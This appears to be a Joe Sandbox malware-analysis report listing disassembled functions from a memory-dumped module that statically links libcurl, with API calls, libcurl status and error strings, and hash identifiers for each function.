                                                                                                                            APIs
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED566
                                                                                                                            • curl_mfprintf.LIBCURL(89000005,** Resuming transfer from byte position %I64d,00051C86,BF830000,83C70000,00000620,000F4240,00000000,868D0000,6B6D1696,?), ref: 6B6ED59D
                                                                                                                            • curl_mfprintf.LIBCURL(89000005, %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed,83C70000,00000620,000F4240,00000000,868D0000,6B6D1696,?), ref: 6B6ED5B0
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED5FF
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED623
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED636
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED677
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED6D5
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED702
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED715
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED76F
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED891
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED8A1
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6ED8C7
                                                                                                                            • curl_mfprintf.LIBCURL(89000005,%3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s,?,?,00000000,?,?,00000000,?,?,00000000,?,?,00000000), ref: 6B6ED9A1
                                                                                                                            Strings
                                                                                                                            • %3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s, xrefs: 6B6ED996
                                                                                                                            • %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed, xrefs: 6B6ED5A5
                                                                                                                            • ** Resuming transfer from byte position %I64d, xrefs: 6B6ED592
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$curl_mfprintf
                                                                                                                            • String ID: %3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$** Resuming transfer from byte position %I64d
                                                                                                                            • API String ID: 2030109004-664487449
                                                                                                                            • Opcode ID: db3f113b70da083b765a50fc806a447d35dc14095701659600f55c3ffc8dd59d
                                                                                                                            • Instruction ID: bb7f79e587f0cdd1d49d448b22a8ea265cd5d91b23e6efc951bb48ca551e3b89
                                                                                                                            • Opcode Fuzzy Hash: db3f113b70da083b765a50fc806a447d35dc14095701659600f55c3ffc8dd59d
                                                                                                                            • Instruction Fuzzy Hash: EAE14CB5945708AFEB209FB4CD40F9ABBFABF89308F004459E95DA7251DB356942CF20
                                                                                                                            Function 6B6DCF60 Relevance: 31.7, APIs: 3, Strings: 15, Instructions: 245COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • curl_maprintf.LIBCURL(Authorization: Bearer %s,?,?,?,?,?,?,?,?,?), ref: 6B6DCFF2
                                                                                                                            • curl_maprintf.LIBCURL(%s:%s,?,6B72B98E,?,00000000), ref: 6B6DD106
                                                                                                                            • curl_maprintf.LIBCURL(%sAuthorization: Basic %s,Proxy-,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6B6DD180
                                                                                                                              • Part of subcall function 6B6E48E0: curl_mvaprintf.LIBCURL(?,?,?,6B6C66CB,%s.%s.tmp,?,?,?,?,?,?), ref: 6B6E48EA
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: curl_maprintf$curl_mvaprintf
                                                                                                                            • String ID: %s auth using %s with user '%s'$%s:%s$%sAuthorization: Basic %s$Authorization$Authorization:$Authorization: Bearer %s$Basic$Bearer$Digest$NTLM$Negotiate$Proxy$Proxy-$Proxy-authorization$Server
                                                                                                                            • API String ID: 3491783128-3980008082
                                                                                                                            • Opcode ID: 41f5005bcb8de46792e1601edc9b846f7e0bdc4975c1d72d185c4e1dc25c4f0c
                                                                                                                            • Instruction ID: 8342c095e40542ffc9cf4941255a3cb3eb1060aafce37592d989218fe20e574f
                                                                                                                            • Opcode Fuzzy Hash: 41f5005bcb8de46792e1601edc9b846f7e0bdc4975c1d72d185c4e1dc25c4f0c
                                                                                                                            • Instruction Fuzzy Hash: B181D5B1A84119AFDB00AF68DD41BEAB7B8EF45355F0480A6FC089B201D73ADD51CBE5
                                                                                                                            Function 6B6CDE80 Relevance: 23.1, APIs: 2, Strings: 11, Instructions: 375COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 6B6CDEE5
                                                                                                                            • curl_maprintf.LIBCURL(%u.%u.%u.%u,00000000,00000000,00000000,00000000), ref: 6B6CE134
                                                                                                                              • Part of subcall function 6B6E48E0: curl_mvaprintf.LIBCURL(?,?,?,6B6C66CB,%s.%s.tmp,?,?,?,?,?,?), ref: 6B6E48EA
                                                                                                                              • Part of subcall function 6B6D84A0: inet_pton.WS2_32(00000002,00000000,?), ref: 6B6D8590
                                                                                                                              • Part of subcall function 6B6D84A0: inet_pton.WS2_32(00000017,00000000,?), ref: 6B6D85C0
                                                                                                                              • Part of subcall function 6B6C2A60: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B6C2BA0
                                                                                                                            Strings
                                                                                                                            • Bad PASV/EPSV response: %03d, xrefs: 6B6CE3A3
                                                                                                                            • Skip %u.%u.%u.%u for data connection, re-use %s instead, xrefs: 6B6CE10E
                                                                                                                            • %c%c%c%u%c, xrefs: 6B6CDF1B
                                                                                                                            • Illegal port number in EPSV reply, xrefs: 6B6CDF60
                                                                                                                            • %u,%u,%u,%u,%u,%u, xrefs: 6B6CE06A
                                                                                                                            • Can't resolve proxy host %s:%hu, xrefs: 6B6CE1DD
                                                                                                                            • Couldn't interpret the 227-response, xrefs: 6B6CE083
                                                                                                                            • Weirdly formatted EPSV reply, xrefs: 6B6CDFCA
                                                                                                                            • %u.%u.%u.%u, xrefs: 6B6CE12F
                                                                                                                            • Connecting to %s (%s) port %d, xrefs: 6B6CE304
                                                                                                                            • Can't resolve new host %s:%hu, xrefs: 6B6CE257
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: inet_pton$Unothrow_t@std@@@___from_strstr_to_strchr__ehfuncinfo$??2@curl_maprintfcurl_mvaprintf
                                                                                                                            • String ID: %c%c%c%u%c$%u,%u,%u,%u,%u,%u$%u.%u.%u.%u$Bad PASV/EPSV response: %03d$Can't resolve new host %s:%hu$Can't resolve proxy host %s:%hu$Connecting to %s (%s) port %d$Couldn't interpret the 227-response$Illegal port number in EPSV reply$Skip %u.%u.%u.%u for data connection, re-use %s instead$Weirdly formatted EPSV reply
                                                                                                                            • API String ID: 1323756762-2414412286
                                                                                                                            • Opcode ID: 8edb4c218f032cfd76fb9cc2ca34a54b9462158e2c197e5db2f3a8ac02b2ccc6
                                                                                                                            • Instruction ID: 9b476dc9360a4297d85fbd4345057c6bfa2be9f0615985fb6080ad1090db44f5
                                                                                                                            • Opcode Fuzzy Hash: 8edb4c218f032cfd76fb9cc2ca34a54b9462158e2c197e5db2f3a8ac02b2ccc6
                                                                                                                            • Instruction Fuzzy Hash: 31D1E8F1E00119ABDB249F64CD42BEBB7B8FF05315F0001E6E91D96141D73DAAA48BE6
                                                                                                                            Function 6B6DB5C0 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 205COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • curl_strnequal.LIBCURL(Negotiate,?,00000009,00000000,?,?,?,00000000), ref: 6B6DB61C
                                                                                                                            • curl_strnequal.LIBCURL(NTLM,?,00000004,00000000,?,?,?,00000000), ref: 6B6DB6A0
                                                                                                                            • curl_strnequal.LIBCURL(Digest,?,00000006,?,?,?,00000000,?,?,?,00000000), ref: 6B6DB704
                                                                                                                            • curl_strnequal.LIBCURL(Basic,?,00000005,?,?,?,?,?,?,00000000,?,?,?,00000000), ref: 6B6DB75D
                                                                                                                              • Part of subcall function 6B6F06B0: curl_mvsnprintf.LIBCURL(?,00000801,00000000,$lnk), ref: 6B6F06EF
                                                                                                                              • Part of subcall function 6B6F06B0: curl_msnprintf.LIBCURL(?,00000004,...,?,?,?,00000E20), ref: 6B6F072F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: curl_strnequal$curl_msnprintfcurl_mvsnprintf
                                                                                                                            • String ID: Authentication problem. Ignoring this.$Basic$Bearer$Digest$Ignoring duplicate digest auth header.$NTLM$Negotiate$t!
                                                                                                                            • API String ID: 4236074386-280430007
                                                                                                                            • Opcode ID: c8096b9e5d99eeb61ee63aca6b54e8228c6aa30130b25ab1eccf778e090fa84c
                                                                                                                            • Instruction ID: 33ce46a4e2062f0b9dabf5a3fb96dfe9c8cd31cc583fb3e54eb72bf5b2d75bab
                                                                                                                            • Opcode Fuzzy Hash: c8096b9e5d99eeb61ee63aca6b54e8228c6aa30130b25ab1eccf778e090fa84c
                                                                                                                            • Instruction Fuzzy Hash: 28615CF4A04205ABEB008E75DD42B867FE5EF02348F1C80B5ECA98B146E73ED555CBA5
                                                                                                                            Function 6B725193 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 113COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _free.LIBCMT ref: 6B7251CC
                                                                                                                              • Part of subcall function 6B71F7EA: RtlFreeHeap.NTDLL(00000000,00000000,?,6B725EE0,6B7438A0,00000000,6B7438A0,00000000,?,6B725F07,6B7438A0,00000007,6B7438A0,?,6B72532A,6B7438A0), ref: 6B71F800
                                                                                                                              • Part of subcall function 6B71F7EA: GetLastError.KERNEL32(6B7438A0,?,6B725EE0,6B7438A0,00000000,6B7438A0,00000000,?,6B725F07,6B7438A0,00000007,6B7438A0,?,6B72532A,6B7438A0,6B7438A0), ref: 6B71F812
                                                                                                                              • Part of subcall function 6B725D4F: _free.LIBCMT ref: 6B725D6C
                                                                                                                              • Part of subcall function 6B725D4F: _free.LIBCMT ref: 6B725D7E
                                                                                                                              • Part of subcall function 6B725D4F: _free.LIBCMT ref: 6B725D90
                                                                                                                              • Part of subcall function 6B725D4F: _free.LIBCMT ref: 6B725DA2
                                                                                                                              • Part of subcall function 6B725D4F: _free.LIBCMT ref: 6B725DB4
                                                                                                                              • Part of subcall function 6B725D4F: _free.LIBCMT ref: 6B725DC6
                                                                                                                              • Part of subcall function 6B725D4F: _free.LIBCMT ref: 6B725DD8
                                                                                                                              • Part of subcall function 6B725D4F: _free.LIBCMT ref: 6B725DEA
                                                                                                                              • Part of subcall function 6B725D4F: _free.LIBCMT ref: 6B725DFC
                                                                                                                              • Part of subcall function 6B725D4F: _free.LIBCMT ref: 6B725E0E
                                                                                                                              • Part of subcall function 6B725D4F: _free.LIBCMT ref: 6B725E20
                                                                                                                              • Part of subcall function 6B725D4F: _free.LIBCMT ref: 6B725E32
                                                                                                                              • Part of subcall function 6B725D4F: _free.LIBCMT ref: 6B725E44
                                                                                                                            • _free.LIBCMT ref: 6B7251EE
                                                                                                                            • _free.LIBCMT ref: 6B725203
                                                                                                                            • _free.LIBCMT ref: 6B72520E
                                                                                                                            • _free.LIBCMT ref: 6B725230
                                                                                                                            • _free.LIBCMT ref: 6B725243
                                                                                                                            • _free.LIBCMT ref: 6B725251
                                                                                                                            • _free.LIBCMT ref: 6B72525C
                                                                                                                            • _free.LIBCMT ref: 6B725294
                                                                                                                            • _free.LIBCMT ref: 6B72529B
                                                                                                                            • _free.LIBCMT ref: 6B7252B8
                                                                                                                            • _free.LIBCMT ref: 6B7252D0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                            • String ID: 0+tk
                                                                                                                            • API String ID: 776569668-1950648990
                                                                                                                            • Opcode ID: 13910025d95651ce11ef8b717217722e1949e0d252790c558f1c6dc48ce4233b
                                                                                                                            • Instruction ID: 8d1b2b85e80805f26ad5a6811ec0a281e8239c2ef68a84381a699a2fd23cbaf9
                                                                                                                            • Opcode Fuzzy Hash: 13910025d95651ce11ef8b717217722e1949e0d252790c558f1c6dc48ce4233b
                                                                                                                            • Instruction Fuzzy Hash: 79313D716083019FEB11AA75EA49B5E73E9FF00314F5448AAF559EB195DF38E940CB30
                                                                                                                            Function 6B6FE810 Relevance: 21.3, APIs: 3, Strings: 9, Instructions: 288COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6B6F06B0: curl_mvsnprintf.LIBCURL(?,00000801,00000000,$lnk), ref: 6B6F06EF
                                                                                                                              • Part of subcall function 6B6F06B0: curl_msnprintf.LIBCURL(?,00000004,...,?,?,?,00000E20), ref: 6B6F072F
                                                                                                                            • curl_slist_free_all.LIBCURL(00000000,?,?,?,?,?,?,?,?,?,Moving trailers state machine from initialized to sending.,?,?,?), ref: 6B6FE994
                                                                                                                              • Part of subcall function 6B6DB530: ___from_strstr_to_strchr.LIBCMT ref: 6B6DB55B
                                                                                                                            • curl_slist_free_all.LIBCURL(00000000,?,Successfully compiled trailers.,?,?,?,?,?,?,?,?,?,Moving trailers state machine from initialized to sending.,?,?,?), ref: 6B6FE8CD
                                                                                                                            • curl_msnprintf.LIBCURL(?,0000000B,%zx%s,?,6B72BF70), ref: 6B6FEAC6
                                                                                                                              • Part of subcall function 6B6F05D0: curl_mvsnprintf.LIBCURL(?,00000100,6B6EC830,?), ref: 6B6F0610
                                                                                                                            Strings
                                                                                                                            • Signaling end of chunked upload after trailers., xrefs: 6B6FEBBE
                                                                                                                            • read function returned funny value, xrefs: 6B6FEA35
                                                                                                                            • operation aborted by callback, xrefs: 6B6FE945
                                                                                                                            • Successfully compiled trailers., xrefs: 6B6FE8BF
                                                                                                                            • Signaling end of chunked upload via terminating chunk., xrefs: 6B6FEB1B
                                                                                                                            • Read callback asked for PAUSE when not supported!, xrefs: 6B6FE9DC
                                                                                                                            • %zx%s, xrefs: 6B6FEAA9
                                                                                                                            • Moving trailers state machine from initialized to sending., xrefs: 6B6FE842
                                                                                                                            • operation aborted by trailing headers callback, xrefs: 6B6FE96F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: curl_msnprintfcurl_mvsnprintfcurl_slist_free_all$___from_strstr_to_strchr
                                                                                                                            • String ID: %zx%s$Moving trailers state machine from initialized to sending.$Read callback asked for PAUSE when not supported!$Signaling end of chunked upload after trailers.$Signaling end of chunked upload via terminating chunk.$Successfully compiled trailers.$operation aborted by callback$operation aborted by trailing headers callback$read function returned funny value
                                                                                                                            • API String ID: 2651734479-586909597
                                                                                                                            • Opcode ID: 15b5f75adae323d47655727904edebe06619b777ec2944eae5018b1d6dc850e1
                                                                                                                            • Instruction ID: 5ec24b1a15113c08fe1dc6715742f985755d5435214dab81c5911d016e519dec
                                                                                                                            • Opcode Fuzzy Hash: 15b5f75adae323d47655727904edebe06619b777ec2944eae5018b1d6dc850e1
                                                                                                                            • Instruction Fuzzy Hash: 5CA118B1E04205ABD704CF78DD867EEFBB9FF05314F00016AE918A7241DBB925958BE5
                                                                                                                            Function 6B6CB160 Relevance: 21.3, APIs: 14, Instructions: 267COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 6B6E27F0: curl_slist_free_all.LIBCURL(?,?), ref: 6B6E2801
                                                                                                                              • Part of subcall function 6B6E27F0: curl_slist_free_all.LIBCURL(?), ref: 6B6E2812
                                                                                                                            • curl_mime_init.LIBCURL(?), ref: 6B6CB187
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: curl_slist_free_all$curl_mime_init
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2112604817-0
                                                                                                                            • Opcode ID: a88f9dcfef39ff9364b0d8e19b579247a46f3ed52b70fa7909d89819ecf8c82a
                                                                                                                            • Instruction ID: 609fc19877e9ead87d7f5812058a829b777d767c9ee2c97e5721692f23df01fd
                                                                                                                            • Opcode Fuzzy Hash: a88f9dcfef39ff9364b0d8e19b579247a46f3ed52b70fa7909d89819ecf8c82a
                                                                                                                            • Instruction Fuzzy Hash: D58116F2E496196BDB118E749C41BAB77A9FF04324F0D02A4EC08AB351E72DDD1587E2
                                                                                                                            Function 6B6CBF20 Relevance: 19.6, APIs: 1, Strings: 10, Instructions: 383COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • curl_easy_strerror.LIBCURL(00000000), ref: 6B6CC103
                                                                                                                            Strings
                                                                                                                            • partial download completed, closing connection, xrefs: 6B6CC25B
                                                                                                                            • Received only partial file: %I64d bytes, xrefs: 6B6CC417
                                                                                                                            • Remembering we are in dir "%s", xrefs: 6B6CC082
                                                                                                                            • Exceeded storage allocation, xrefs: 6B6CC2B3
                                                                                                                            • Uploaded unaligned file size (%I64d out of %I64d bytes), xrefs: 6B6CC382
                                                                                                                            • server did not report OK, got %d, xrefs: 6B6CC29E
                                                                                                                            • Failure sending ABOR command: %s, xrefs: 6B6CC109
                                                                                                                            • ABOR, xrefs: 6B6CC0E6
                                                                                                                            • control connection looks dead, xrefs: 6B6CC20D
                                                                                                                            • No data was received!, xrefs: 6B6CC3FD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: curl_easy_strerror
                                                                                                                            • String ID: ABOR$Exceeded storage allocation$Failure sending ABOR command: %s$No data was received!$Received only partial file: %I64d bytes$Remembering we are in dir "%s"$Uploaded unaligned file size (%I64d out of %I64d bytes)$control connection looks dead$partial download completed, closing connection$server did not report OK, got %d
                                                                                                                            • API String ID: 1399792982-944385548
                                                                                                                            • Opcode ID: 5d4d9abe4c6b7a3d533ef39aa8259b8a0b34df525ab9a1a7a67d9c0112e99e71
                                                                                                                            • Instruction ID: 0328b1e6326bbd5512f31284260a2f6341376b5db5cb92c0c9e85d3c4e7a325f
                                                                                                                            • Opcode Fuzzy Hash: 5d4d9abe4c6b7a3d533ef39aa8259b8a0b34df525ab9a1a7a67d9c0112e99e71
                                                                                                                            • Instruction Fuzzy Hash: CCE1EFF19042449BEB11CF68C884B9B3BA5EF46314F1845E9EC5E9B282D73D9580CBA2
                                                                                                                            Function 6B725D4F Relevance: 19.6, APIs: 13, Instructions: 88COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _free.LIBCMT ref: 6B725D6C
                                                                                                                              • Part of subcall function 6B71F7EA: RtlFreeHeap.NTDLL(00000000,00000000,?,6B725EE0,6B7438A0,00000000,6B7438A0,00000000,?,6B725F07,6B7438A0,00000007,6B7438A0,?,6B72532A,6B7438A0), ref: 6B71F800
                                                                                                                              • Part of subcall function 6B71F7EA: GetLastError.KERNEL32(6B7438A0,?,6B725EE0,6B7438A0,00000000,6B7438A0,00000000,?,6B725F07,6B7438A0,00000007,6B7438A0,?,6B72532A,6B7438A0,6B7438A0), ref: 6B71F812
                                                                                                                            • _free.LIBCMT ref: 6B725D7E
                                                                                                                            • _free.LIBCMT ref: 6B725D90
                                                                                                                            • _free.LIBCMT ref: 6B725DA2
                                                                                                                            • _free.LIBCMT ref: 6B725DB4
                                                                                                                            • _free.LIBCMT ref: 6B725DC6
                                                                                                                            • _free.LIBCMT ref: 6B725DD8
                                                                                                                            • _free.LIBCMT ref: 6B725DEA
                                                                                                                            • _free.LIBCMT ref: 6B725DFC
                                                                                                                            • _free.LIBCMT ref: 6B725E0E
                                                                                                                            • _free.LIBCMT ref: 6B725E20
                                                                                                                            • _free.LIBCMT ref: 6B725E32
                                                                                                                            • _free.LIBCMT ref: 6B725E44
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 776569668-0
                                                                                                                            • Opcode ID: d6f6521d2478c0c5de8c77a867bf66b78e53d88e6d2cf8f268a1b18c22cca338
                                                                                                                            • Instruction ID: dcd120c6d182f2d577ab5bf9f2236e12ce8fe9c6d3c0d9284ae8c497c468e10f
                                                                                                                            • Opcode Fuzzy Hash: d6f6521d2478c0c5de8c77a867bf66b78e53d88e6d2cf8f268a1b18c22cca338
                                                                                                                            • Instruction Fuzzy Hash: 6D215731508604DBCB14FE78E2DAD1F73F9BA043153A00C6AF569EB549DB78F8908AB4
                                                                                                                            Function 6B6FACC0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 141libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32,?,00000002,6B6FAEAE), ref: 6B6FACCE
                                                                                                                            • GetProcAddress.KERNEL32(00000000,LoadLibraryExA), ref: 6B6FACE8
                                                                                                                            • _strpbrk.LIBCMT ref: 6B6FACFC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3325977001.000000006B6C1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B6C0000, based on PE: true
                                                                                                                            • Associated: 0000000A.00000002.3325797692.000000006B6C0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326594930.000000006B741000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            • Associated: 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_6b6c0000_ast.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProc_strpbrk
                                                                                                                            • String ID: AddDllDirectory$LoadLibraryExA$kernel32
                                                                                                                            • API String ID: 1657965159-3327535076
                                                                                                                            • Opcode ID: fabef46edf3d5ddf9ffdfcb8dbc91b4d58f699b7bd92a86de09bc508f7fc962e
